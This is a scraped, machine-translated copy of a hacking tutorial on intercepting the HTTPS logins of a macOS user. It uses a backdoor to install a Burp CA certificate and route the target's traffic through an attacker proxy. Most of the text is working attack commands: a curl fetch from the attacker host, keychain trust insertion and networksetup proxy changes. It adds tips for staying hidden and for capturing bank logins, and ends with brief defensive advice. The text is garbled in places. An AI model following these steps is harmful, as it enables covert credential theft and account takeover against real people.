قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack Facebook & Gmail Accounts Owned By MacOS Targets «Zero Bytes :: WonderHowTo

How to Hack Facebook & Gmail Accounts Owned By MacOS Targets «Zero Bytes :: WonderHowTo



It only takes a few commands to manipulate the secure HTTPS traffic of a MacBook and pick login passwords from the encrypted data. Let's take Facebook and Gmail hacking to the next level by capturing real-time web traffic from Safari and Google Chrome.

Both Facebook and Gmail have exceptional web application security practices. They quickly block IP addresses to perform brute force attacks and lock accounts after only a few failed logon attempts.

In addition, successful logins originating from new IP addresses or web browsers trigger these websites to further authenticate logon. This could mean that the friends of the target are matched with their Facebook profile pictures, or a one-time usage code is sent to the destination's smartphone.

In truth, it will usually be easier to compromise a target's operating system for credentials (1

9659002) This article focuses specifically on learning the Facebook and Gmail passwords of a macOS target user in a shared wi-fi. Fi network. In order to come along, the readers must have access to the target's MacBook to perform this attack. This can be accomplished using various methods; With just a few moments of physical access, the MacBook can be compromised with a single-user-mode attack. Alternatively, the social engineering goal may be optimal when opening a trojanized file on a USB drive.

Understanding the Attack

Essentially, we force the Safari or Chrome browser of the destination to send all HTTP and HTTPS requests to one of our controlled Burp Suite proxy. After receiving the web traffic, Burp will be able to interpret all HTTPS data in real time. Normally such activity is not possible, but we configure the operating system of the target system to trust the SSL certificate used by our proxy.

For readers who previously configured their browser with a burp proxy That's exactly what we do with the target's browsers – but without their knowledge.

We start with Burp in Kali Linux to intercept the traffic. Then we download the burp certificate from our backdoor and import it into the target's keychain so that the Safari or Chrome browser does not alert them to suspicious certificate activity. Finally, we configure the MacBook to send all HTTP and HTTPS traffic to our Burp proxy.

Our attack requires root privileges because it is not possible to import certificates as a normal user into the macOS keychain. Root can be achieved by backdooring the MacBook or by performing privilege escalation attacks such as password phishing, empire to drop the password hash of the target, dumping the browser cache, and detecting often-reused passwords.

Step 1: Install Burp Suite (if required)

Depending on your version of Kali Linux, the Burp Suite may not be installed yet. To install burp, use the following commands apt-get .

  apt-get update && apt-get install burpsuite 

Step 2: Set up Burp Suite

Open Burp, click on the Click on the "Proxy" tab, then on the "Options" tab, and click on the "Edit" button under Proxy Listeners . Enter the desired binding port at the specified location. I use 9999 because it's easy to remember, but this number is arbitrary.

Next, specify the address you want to listen to; This attack is for a local area network, so your address 192.168.1.xx should be used. I'm doing this in an internal lab, so my attacker's local IP address is 10.42.0.1. In case of doubt, the option "All interfaces" should be used instead.

Click "OK" to save the changes. Then go back to the "Intercept" section and make sure that "Intercept off" is. Disabling this will allow the target's web traffic to flow without interruption while the device continues to be used as a proxy.

Step 3: Download Burp Certificate

Enter MacBook with our backdoor First you need to download the burp certificate from our burp proxy. To do this, use the following command curl

  curl -s --insecure --proxy http://10.42.0.1:9999 http: // burp / cert -o / tmp / burp. 

In the above command, curl tacitly ( -s ) will download the certificate from our potash machine. The argument – proxy is required because we instruct curl to use the newly configured burp listener to retrieve the certificate. This certificate is not trusted by curl (or a web browser) by default. Therefore, the – unsafe argument must ignore warnings in the output. Finally, the burp certificate ( -o ) is stored in the directory / tmp with the filename burp.der . The file extension .der is just the default file format of the certificate and should not be changed.

Step 4: Importing the Burp Certificate

Now import the burp certificate that was downloaded to the keychain of the target by using the following [19659025] security command.

  Security add-trusted-cert -k /Library/Keychains/System.keychain -d /tmp/burp.der

Security is added ( add-trusted-cert ) and the certificate ( -d /tmp/burp.der) fully trust in the macOS primary system Keychain ( -k ). All we have to do now is configure macOS to send us the entire web traffic of the target.

Step 5: Configure MacBook Proxy Settings

At this point, we can configure the destination MacBook to send through our backdoor. We all have its HTTP and HTTPS web traffic.

Networksetup is a command-line tool that configures network settings in the macOS system settings. Using networksetup from the command line is similar to changing the network settings in macOS directly, as if we were sitting in front of the MacBook.

Use the following command networksetup with the argument -listallnetworkservices Services Available

  / usr / sbin / networksetup -listallnetworkservices

iPhone USB
Wireless Internet access
Bluetooth PAN
Thunderbolt Bridge 

Note the service "Wi-Fi" here. This is the service we probably need to change. If the target uses an external wireless adapter, it may also appear here. In this case, an attacker would need to change these proxy settings instead.

The following arguments -getwebproxy (HTTP) and -getsecurewebproxy (HTTPS) can be used to display any existing proxy settings that the target may have configured itself.

  / usr / sbin / networksetup -getwebproxy "Wi-Fi"

Enabled: No.
Server:
Harbor: 0
Authenticated proxy enabled: 0 
  / usr / sbin / networksetup -getsecurewebproxy "Wi-Fi"

Enabled: No.
Server:
Harbor: 0
Authenticated Proxy Enabled: 0 

As we can see, HTTP and HTTPS proxies are disabled. This is a good thing, since the target has probably never changed its proxy settings and does not think to look there if applications act strangely.

To route the destination HTTP and HTTPS traffic through our burp proxy, use the following commands:

  / usr / sbin / networksetup -setwebproxy "Wi-fi" 10.42.0.1 9999
/ usr / sbin / networksetup -setsecurewebproxy "Wi-fi" 10.42.0.1 9999 

Remember to change the IP address of the attacker (10.42.0.1) to your local network address. If you have chosen a port number other than 9999, you must also change this in the above commands. The newly configured proxy settings take effect immediately.

Step 6: Capture Facebook Passwords

In the Burp Suite, go to the HTTP History tab to see the target's web traffic in real time. Pay close attention to POST requests in column because they contain the most compromising data. Example: The Facebook e-mail address and password are displayed in the following screenshot.

The email address of the target (target@email.com) and their password are very easy to identify thanks to Facebook's clearly defined " email = "and " pass = "Parameters

Step 7: Gmail capture passwords

However, sites like Gmail are more difficult to manage – especially if the target is a strong one Password used that contains many special characters. Special characters are automatically encoded by our web browsers, making a password in a wall of encrypted gibberish much harder to recognize (see below).

  • Example password: g $ FR3eDW & ujYH6I {* 5aa
  • Encoded in: g% 24FR3eDW% 26ujYH6I% 7B *% 5D5aa

As we can see It's like trying to find a needle in a haystack. The trick is to isolate the problem. At the time of writing, Gmail stores the user's encrypted password in parameter " f.req = " (see below).

Select the entire parameter and copy the text. Then open the Decoder tab in Burp and paste the coded text in the top window. Click on the "Decode as" button and select the "URL" option.

The bottom window will now display the decoded text in a slightly more readable format. Copy the decrypted text and paste it into your favorite text editor (Gedit, Geany, etc.).

We can see that the data is represented by many commas () in an array-like format. In the case of Gmail, the password is in quotes between the eighth and ninth commas (see below).

Facebook and Gmail are just two examples. The parameters that contain email addresses and passwords are likely to be different for each login we intercept. This is especially true for the Top 100 websites, which handle authentication differently and offer state-of-the-art security practices. Readers are encouraged to test this attack on their target site (if Facebook is not your target) to learn how login parameters are handled to make passwords easier to find.

Step 8: Disabling proxy on the destination MacBook [19659007] After completing the attack, remember to disable the previously configured proxy settings. Otherwise, the destination sends web traffic to your IP address for a long time after disconnecting from the Wi-Fi network. Such activity is likely to arouse suspicion because the target can not access the Internet without your burp proxy.

Use the following network setup commands to disable the proxy settings on the destination MacBook.

  / usr / sbin / networksetup -setwebproxystate "Wi-Fi" off
/ usr / sbin / networksetup -setsecurewebproxystate "Wi-Fi" off 

Improving Attack

There are some limitations and areas where this attack can be improved.

Option 1: Remote Hacking with Mitmproxy

Alternatively, Mitmproxy can be used to intercept, inspect, modify, and play Web traffic similar to Burp. While Burp is more sophisticated and fully equipped, Mitmproxy has a command line interface that can easily run on a virtual private server. Using a VPS would allow an attacker to intercept the target's web traffic as it moves between different Wi-Fi networks.

Option 2: Firefox Warning

Configuring macOS to use the burp proxy also forces Firefox's proxy feature of its requests to the attacker's device. However, unlike Safari and Chrome, importing the burp certificate into the macOS keychain does not affect Firefox. This is because Firefox independently checks certificates and does not use the macOS Keychain. If the target uses Safari or Chrome and Firefox at the same time, they'll probably notice the suspicious activity. Below is an example of Firefox recognizing the burp certificate.

Option 3: More apps configured for the macOS proxy

Like Firefox, applications like Spotify, Skype, the Opera, VLC, and Thunderbird web browsers Validate certificates without using the macOS Keychain. This could cause the applications to notify the target user of suspicious activity or break it completely.

Unfortunately, after configuring the burp proxy, I did not run any tests on popular third-party applications. Readers are encouraged to continue this research and find out for themselves whether such applications are affected by the proxy before this attack is performed in real-world scenarios.

Option 4: Custom SSL Certificates

In this guide, we learned to use the standard SSL certificate, which is automatically generated by Burp Suite. When a target user verifies the certificate in their Safari or Chrome browser, the "PortSwigger CA" certificate (shown below) is displayed. PortSwigger, the creator of the Burp Suite, is clearly the publisher of this certificate, so this would be an instant red flag. Creating a unique certificate with a compelling domain name may prevent the target from identifying the fraudulent certificate.

Protecting yourself from keychain and SSL-based attacks [19659007] There is no simple solution here. Antivirus software will not flag the imported Burp certificate as suspicious, so it's up to us to regularly monitor our keyring for unusual activity.

If an attacker has root privileges and imports certificates into your operating system, you have bigger issues to deal with. Identifying an attacker on your system can be extremely difficult. However, the following solutions may help:

Tip 1: Check Your Keychain

We can not rely on common antivirus software to protect our certificates. Keychain can be opened by searching for "Keychain" in Spotlight. Do not be afraid to look around you. Certificate details can be expanded and analyzed. If something was not placed there by you, do not be alarmed as it might have been by a legitimate application in the past.

For certificates we're not sure about, we can Google them and / or request support Communities like the official Apple Support Community Apple StackExchange and Information Security StackExchange.

Tip 2: Check your proxy settings

The proxy settings are a bit harder to find. Use Spotlight to search for "Proxy" and then click the "Advanced" button. Then click the Proxies tab and highlight the Web Proxy (HTTP) and Secure Web Proxy (HTTPS) tabs. If you have not set these proxies yourself, you should disable them and click OK.

Tip 3: Check Your Browser Certificates

Before You Go Logging on to websites is usually a good idea to check the SSL certificate. This can be done in Safari and Chrome by clicking the padlock icon in the URL bar, then clicking the View Certificate or Certificate button. This button opens a new window with the certificate details. Click on the "Details" option and scroll down to the SHA-256 and SHA-1 fingerprints at the bottom of the certificate.

Well, with an additional device (like another laptop or smartphone), inspect the website certificate again and compare the fingerprints – which should match exactly. If the fingerprints between all your devices do not match, this could be a sign that fraudulent certificates are in effect.

Tip # 4: Examine Your Web Traffic

Wireshark is a excellent tool for identifying suspicious traffic coming from your computer. If an attacker has set up a backdoor, he probably uses Netcat or Python to establish TCP connections between you and their servers at set intervals. In the following screenshot we can see how the attacker (10.42.0.1) issues commands to the target MacBook (10.42.0.98) on port 4444.

Beyond Facebook & Gmail Hacking

While Facebook and Gmail were used as examples in this article, the manipulation of the Web allows Data traffic of a MacBook, in fact, an attacker to intercept all HTTPS traffic for each visited by the destination website. This means that Amazon, Twitter, Instagram, Yahoo, and Bank logins are intercepted and immediately compromised-even if the destination is already signed in.

I hope this tutorial has inspired some readers to think differently about re-exploitation. HTTPS-based attacks are considered by some to be the highest level of hacking. If we continue to find ways to circumvent the encryption, the targets will have no opportunity to defend themselves against such attacks. There is no information on how many network-based attacks can be used where SSL protection is not an obstacle.

Follow me and meet me on Twitter @tokyoneon_ or leave questions and comments if you have them

Do not Miss: How to Hack Mojave 10:14 with a Self-Destructing Payload

Cover Picture and screenshots of tokyoneon / Zero Btye




Source link